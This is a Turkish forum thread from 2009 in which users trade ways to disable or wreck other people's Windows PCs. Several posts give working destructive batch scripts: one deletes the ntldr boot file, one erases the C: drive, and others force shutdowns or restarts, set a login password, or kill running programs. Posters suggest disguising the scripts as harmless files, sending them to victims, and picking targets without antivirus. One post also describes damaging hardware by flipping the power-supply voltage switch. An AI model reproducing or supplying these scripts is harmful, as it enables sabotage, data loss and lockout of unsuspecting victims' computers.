pc bozma

Bu başlık kilitlidir. Yeni mesajlar gönderilemez veya mevcut mesajlar düzenlenemez.
suikastby
20-05-2009, 08:26   |  #26  
Yıllanmış Üye
Teşekkür Sayısı: 0
370 mesaj

ne anlamlı konu pöff

baris57
20-05-2009, 11:23   |  #27  
Yıllanmış Üye
247 mesaj
bektash
Not Defterini açıp
[ Tüm kodu seç ] [ Yeni Pencerede Göster ]
cd.. cd.. attrib -s -h -r -a c:\ntldr del c:\ntldr shutdown -r
Bunu Not defterinde Farklı Kaydet Deyip Program resim müzik vs vs İsimlendirerek
.bat olarak kaydet.. Örn : Coklu_Msn.bat gibi Daha Sonra Startup'a Yerleştir . Pc açılnca direkt çalışacak .. bir kac sn sonra pc restart yapıcak .. Ama Çoktan Pc bozulmuş olucak :)

be baktash ntdlr yi ne sildirion öğrenmeye çalışıo sen burda   çocugu ugraştırcan hem virüsler onu silmio onu silerse pc bidaa başlamadığından hiçbir veri çalamıyolar çocuk zati bozmadan yapmaya çalışıo iice uğraşçak kurtarmak için

Son Düzenleme: baris57 ~ 20 Mayıs 2009 11:26
theyyous
20-05-2009, 11:26   |  #28  
theyyous avatarı
Yıllanmış Üye
Teşekkür Sayısı: 1
247 mesaj

system 32 yi sil
öncelikle bir not defteri açıyoruz ondan sonra C:/windows/system32 DELETED yazıyoruz ve txt den bat a çeviriyoruz karşıya gönderdikmi system32 silindi

SAİNT
20-05-2009, 11:36   |  #29  
SAİNT avatarı
Yıllanmış Üye
Teşekkür Sayısı: 3
3,595 mesaj

reg kayıtlarını silerek yapabilirsin başlat regedit ve explorer değerini silerek yapabilirsin.
yada sistem32 dosyası içerisinden dll dosyası silerek.

XpLodeR
20-05-2009, 11:52   |  #30  
Yeni Üye
39 mesaj

CD..
CD..
CD.
erase c:/f/s/q/a

masaüstünü siler

uzantısını .bat olarak kaydetmen gerekiyor

Son Düzenleme: XpLodeR ~ 20 Mayıs 2009 11:55
Mustafa@PC
20-05-2009, 12:19   |  #31  
Mustafa@PC avatarı
Yıllanmış Üye
Teşekkür Sayısı: 5
13,125 mesaj
black rose
bir bilgisayara virüs bulaştırmadan masaüstü de açılacak halde bilgisayar nasıl bozulur
tam anlatamadım ama siz yöntemleri yazarsanız bunun gibi veya değil yazarım
teşekkü
Bilgisayarı neden bozuyorsun...:)

Mustafa Deniz
20-05-2009, 12:28   |  #32  
Mustafa Deniz avatarı
Yıllanmış Üye
Teşekkür Sayısı: 2
752 mesaj
bektash
Not Defterini açıp
Bunu daha önce denemiştim. Ntldr dosyasını meraktan silmiştim. Bilgisayarı açınca ntldr eksik diye hata vermişti. Xp cd'si ile onarım yapılabiliyor çok basittir. CD içerisindeki i386 klasöründe ntldr dosyası var

ama bunun yerine regeditteki HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache anahtarındaki dizeleri sildiririm Kahkaha formattan başka çaresi kalmaz.
Burada Windowsun tüm komutları hangi dll ile hangi dizinde uygulayacağı yazıyor.

Son Düzenleme: Mustafa Deniz ~ 20 Mayıs 2009 12:33
black rose
20-05-2009, 12:30   |  #33  
black rose avatarı
OP Yıllanmış Üye
880 mesaj

yöntemleri kullanmadım zaten
sadece öğrenmek için sordum.

black rose
20-05-2009, 12:45   |  #34  
black rose avatarı
OP Yıllanmış Üye
880 mesaj

CEVAPLARIN ÇOĞU ART NİYETLİ OLD KANISINDA :d

ARKADAŞLAR ÖYLE BİR NİYETİM YOK
TEK SORMAK İSTEDİĞİM
BİR BİLGİSAYAR AÇILABİLİR VE İŞLEM YAPILABİLİR BİR HALDE SADECE KAPANMAYACAK
YANİSÜREKLİ RESETLEYECEK
BUNU SORUYORUM
BİR KERE BAŞIMA GELMİŞTİ AMA TESADÜFEN BOZULMUŞTU

ECHELON_
20-05-2009, 12:47   |  #35  
Yıllanmış Üye
Teşekkür Sayısı: 1
1,644 mesaj
bektash
Not Defterini açıp
Bunu Not defterinde Farklı Kaydet Deyip Program resim müzik vs vs İsimlendirerek
.bat olarak kaydet.. Örn : Coklu_Msn.bat gibi Daha Sonra Startup'a Yerleştir . Pc açılnca direkt çalışacak .. bir kac sn sonra pc restart yapıcak .. Ama Çoktan Pc bozulmuş olucak :)
ARKADAŞIM bu dosyayı bat olarak kaydettikten sonra startupa nasıl ekliyoruz daha doğrusu startup neresi dosyayı nereye atuıcac

ayrıca konu çok yararlı bir konu olmuş elinize sağlık bu konu reyting alır

ayrıca şöyle bir yöntem var yazılım bilgisine gerek yok o kişinin güç kaynağının arkasında etiket altındaki voltaj düğmesini değiştirin pc kapandıkatn sonra bir daha açılamaz ve çok büyük masraf çıkar komple yanar pc

Son Düzenleme: ECHELON_ ~ 20 Mayıs 2009 12:52
baris57
20-05-2009, 14:24   |  #36  
Yıllanmış Üye
247 mesaj

ARKADAŞIM bu dosyayı bat olarak kaydettikten sonra startupa nasıl ekliyoruz daha doğrusu startup neresi dosyayı nereye atuıcac

ayrıca şöyle bir yöntem var yazılım bilgisine gerek yok o kişinin güç kaynağının arkasında etiket altındaki voltaj düğmesini değiştirin pc kapandıkatn sonra bir daha açılamaz ve çok büyük masraf çıkar komple yanar pc     

ama arkadaş öyle demio hackerin evine gelip power suply i bozcak hali yok

_cypher_
20-05-2009, 15:11   |  #37  
Yıllanmış Üye
1,389 mesaj
baris57

ama arkadaş öyle demio hackerin evine gelip power suply i bozcak hali

komple yanmaz ya sadece psu yada sadece anakart yada 2si birden yanar :D

Mustafa@PC
20-05-2009, 15:14   |  #38  
Mustafa@PC avatarı
Yıllanmış Üye
13,125 mesaj

Arkadaşlar pcler ile ne alıp veremediğiniz var ? :D

OSMAN BAĞÇEVAN
20-05-2009, 16:03   |  #39  
Denetmen
6,606 mesaj

1)Karşı Pc'yi kapatmak:
İlk önce not defterini açıyoruz ardından shutdown -s yazıyoruz ve farklı kaydet diyip xxx.bat olarak kaydediyoruz
(xxx dosyanın ismi olacaktır sonra değiştirirsiniz).Bunu karşı tarafa atmak için WinRar'la sıkıştırıyoruz.Sonra da atıyoruz
açtığında Pc'si direkt olarak kapanır(çevrimdışı olduğundan anlarsınız )

2)Karşı Pc'yi Resetlemek:
İlk önce not defterini açıyoruz ardından shutdown -r yazıyoruz ve farklı kaydet diyip xxx.bat olarak kaydediyoruz
(xxx dosyanın ismi olacaktır sonra değiştirirsiniz).Bunu karşı tarafa atmak için WinRar'la sıkıştırıyoruz.Sonra da atıyoruz
açtığında Pc'si direkt olarak resetlenir(çevrimdışı olduğundan anlarsınız )

3)Karşı Pc'ye şifre koymak:
İlk önce not defterini açıyoruz ardından
netuser %username% mustymusty
shutdown -r
yazıyoruz.Ve farklı kaydet diyip xxx.bat olarak kaydediyoruz.Bu arada mustymusty şifre olacaktır
(siz istediğiniz şeyi yazabilirsiniz).WinRar'la sıkıştırıp atıyoruz ve açıldığında Pc restlenecektir
(shutdown -r kodu old. dolayı) açılırken de şifre isteyecektir

4)KarşıPc'nin Ip No'sunu bulmak:
Karşı taraftan dosya kabul edin.O dosya gelirken Başlat>Çalıştır'a cmd yazın.Daha sonra çıkan pencereye netstat -an
yazın.5-6 tane sayı çıkacaktır.Bunların yanında LISTENING yazanlar değildir ona göre.Genelde 2 tane ESTSHHABLED yazan
numaralardır bunlarında 84 ya da 85 ile başlayanıdır.
Ya da karşı tarafa bir dosya yollayın (müzik veya resim tavsiyemdir) Başlat>Çalıştır'a cmd yazın.Çıkan pencereye netstat -n
yazın.5-6 tane sayı çıkacaktır.Bunların yanında LISTENING yazanlar değildir ona göre.Genelde 2 tane ESTSHHABLED yazan
numaralardır bunlarında 84 ya da 85 ile başlayanıdır.

5)Karşı Pc'de çalışan uygulamaları kapatmak:
İlk önce not defterini açıyoruz ardından shutdown -f yazıyoruz ve farklı kaydet diyip xxx.bat olarak kaydediyoruz
açtığında Pc'de çalışan bütün uygulamalar kapanır(kuRban hiçbişey yapamaz..)

6)Yazdıgınız kodların cogunluguna gore msnı kapanır ve ekran gıdıp gelır
ilk basta notepad'ı acıyoruz.karsıdakının sadece msnını kapatmak ıstıyorsak sadece alt alta start tskill msnmsgr yazmanız yeterlı.(ne kadar cok yazarsanız o kadar cok uzun sure kapanır msnı) ekranın kapanıp acılmasınıda ıstıyorsak yıne aynı sekılde alt alta start tskill explorer yazınız.eger ıkısınıde yapmak ıstıyorsanız:
start tskill explorer
start tskill msnmsgr
yukarıdakı gıbı yapınız.ve notepadı farklı kaydet yapıp uzantısını .bat olarak kaydedınız ve kısıye yollayınız.

OSMAN BAĞÇEVAN
20-05-2009, 16:09   |  #40  
Denetmen
6,606 mesaj

arkadaşlar ben bunlardan bi tanesi denedim(hangisi olduğunu hatırlamıyıorum) msn de başkasında  denedim ..gerçekten yazdıkları oldu...kendi pcm de denediğim zaman pc ye reset atıyor ve masaüstü gelmiyor..sadece ctrl+alt+delete yapıp görev yöneticisinden işlem yapabiliyorsun..başkasının pc sinde denediğimde ne olduğunu bilmiyorum:D ama kötü şeyler oldu düşüncesindeyim :)))

OSMAN BAĞÇEVAN
20-05-2009, 16:13   |  #41  
Denetmen
6,606 mesaj

behkteş kardeşin yazdığı şeyi kendi pc m de denedim ..avira antivir personal-free antivirüs programım direk sildi..yüklemedi bat dosyasını..yani galiba deneyeceksek virüs programı olmayan birinde denesek daha iyi olur :))

benim üstte yazdıklarım ise virüs programı da bir hata vermiyor..silmiyor.

Son Düzenleme: OSMAN BAĞÇEVAN ~ 20 Mayıs 2009 16:15
black rose
20-05-2009, 16:14   |  #42  
black rose avatarı
OP Yıllanmış Üye
880 mesaj

SCARFACE_  kimsenin kasasını yakmak masrafa sokmak niyetinde değilim :d
osman_2626  dosya .bat şeklinde kaydedemiyorum

OSMAN BAĞÇEVAN
20-05-2009, 16:17   |  #43  
Denetmen
6,606 mesaj

kardeşim not defterini olmadı başlat-donaltılar-wordPad i seç..istediğini yazıp farklı kaydet de..txt yazan yeri .bat yaz..olacaktır büyük ihtimal..

örnek : shutdown -s
kopyala yap..wordPad ı aç..yapıştır de..dosya-farklı kaydet-asd(istediğin ismi yaz).bat-kaydet..kaydettiğin yere gözat.kesin olarak ordadır..ama başlatmanı ve başkasına göndermeyi tavsiye etmiyoruz tabiki de..

Son Düzenleme: OSMAN BAĞÇEVAN ~ 20 Mayıs 2009 16:20
black rose
20-05-2009, 19:34   |  #44  
black rose avatarı
OP Yıllanmış Üye
880 mesaj
osman_2626
kardeşim not defterini olmadı başlat-donaltılar-wordPad i seç..istediğini yazıp farklı kaydet de..txt yazan yeri .bat yaz..olacaktır büyük ihtimal..

örnek : shutdown -s
kopyala yap..wordPad ı aç..yapıştır de..dosya-farklı kaydet-asd(istediğin ismi yaz).bat-kaydet..kaydettiğin yere gözat.kesin olarak ordadır..ama başlatmanı ve başkasına göndermeyi tavsiye etmiyoruz tabiki de..

bu yöntem de bana göre değil
ben sadece bilgisayar kapanmasın resetlesin isyiorum
bunun yöntemlerini paylaşırmısınız